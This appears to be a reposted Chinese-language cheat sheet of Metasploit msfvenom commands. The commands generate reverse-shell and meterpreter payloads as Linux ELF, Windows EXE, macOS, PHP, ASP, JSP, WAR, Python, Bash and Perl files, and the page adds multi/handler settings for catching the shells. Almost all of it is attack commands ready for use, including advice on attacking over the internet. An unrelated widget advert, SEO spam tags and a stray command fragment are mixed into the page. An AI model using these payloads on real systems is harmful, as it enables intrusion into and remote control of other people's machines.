收藏Metasploit payload
发布时间:2025-09-05 08:38
发布者:网络
浏览次数:通常 metasploit 最有用(对于初学者来说被低估)的功能之一是 msfpayload 模块。可以使用此模块创建多个有效负载,它有助于在几乎任何情况下为您提供外壳。对于这些有效负载中的每一个,您都可以进入 msfconsole 并选择exploit/multi/handler。为使用的相关负载运行“设置负载”并配置所有必要的选项(lhost、lport 等)。执行并等待有效负载运行。对于下面的示例,它是不言自明的,但 lhost 应填写您的 ip 地址(如果在网络内进行攻击,则为 lan ip,如果通过 internet 进行攻击,则为 wan ip),并且 lport 应该是您希望重新连接的端口。
Linux
代码语言:j*ascript代码运行次数:0运行复制msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f elf > shell.elf
Windows
代码语言:j*ascript代码运行次数:0运行复制msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f exe > shell.exe
Mac
代码语言:j*ascript代码运行次数:0运行复制msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <您的 IP 地址> LPORT = <您要连接的端口> -f macho > shell.macho
PHP
代码语言:j*ascript代码运行次数:0运行复制msfvenom -p php / meterpreter_reverse_tcp LHOST = <你的 IP 地址> LPORT = <你的连接端口> -f raw > shell.php cat shell.php | pbcopy && echo '<?php' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
代码语言:j*ascript代码运行次数:0运行复制msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f asp > shell.asp
JSP
代码语言:j*ascript代码运行次数:0运行复制msfvenom -p j*a / jsp_shell_reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f raw > shell.jsp
War
代码语言:j*ascript代码运行次数:0运行复制msfvenom -p j*a / jsp_shell_reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f war > shell.war
Python
jQuery右侧隐藏收缩在线客服
jQuery右侧隐藏收缩在线客服是一款默认隐藏悬浮在右侧,鼠标经过滑出的jQuery在线客服代码。
40
查看详情
代码语言:j*ascript代码运行次数:0运行复制msfvenom -p cmd / unix / reverse_python LHOST = <你的 IP 地址> LPORT = <你要连接的端口> -f raw > shell.py
Bash
代码语言:j*ascript代码运行次数:0运行复制msfvenom -p cmd / unix / reverse_bash LHOST = <您的 IP 地址> LPORT = <您要连接的端口> -f raw > shell.sh
Perl
代码语言:j*ascript代码运行次数:0运行复制msfvenom -p cmd / unix / reverse_perl LHOST = <你的 IP 地址> LPORT = <你要连接的端口> -f raw > shell.pl
Linux Based Shellcode
代码语言:j*ascript代码运行次数:0运行复制msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f <语言>
Windows Based Shellcode
代码语言:j*ascript代码运行次数:0运行复制msfvenom -p windows / meterpreter/ reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f <语言>
Mac Based Shellcode
代码语言:j*ascript代码运行次数:0运行复制msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <您的 IP 地址> LPORT = <您要连接的端口> -f <语言>
设置 Metasploit 以接收传入的 shell
代码语言:j*ascript代码运行次数:0运行复制use exploit/multi/handlerset PAYLOAD <Payload name>set LHOST <LHOST value>set LPORT <LPORT value>set ExitOnSession falseexploit -j -z
完成所需的值后,以下命令将执行您的处理程序 – 'msfconsole -L -r '

以上就是收藏Metasploit payload的详细内容,更多请关注php中文网其它相关文章!
# shell
# php
# linux
# javascript
# java
# windows
# mac
# win
# 您的
# 您要
# 在线客服
# 任务栏
# 你要
# 如何解决
# 则为
# 不可用
# 重命名
# 鼠标
# 浙江互联网营销推广渠道有哪些
# 万年公司网站建设
# 营销网站怎么推广产品
# 湘潭网站建设诚信合作
# 展览会营销推广文案模板
# 渭南网站建设定制开发
# 广丰社区网站优化
# 怎么样让自己的qq群在关键词上排名高
# 荣获十佳政府网站建设
# 高埗服装网站优化的方案





/ reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f <语言>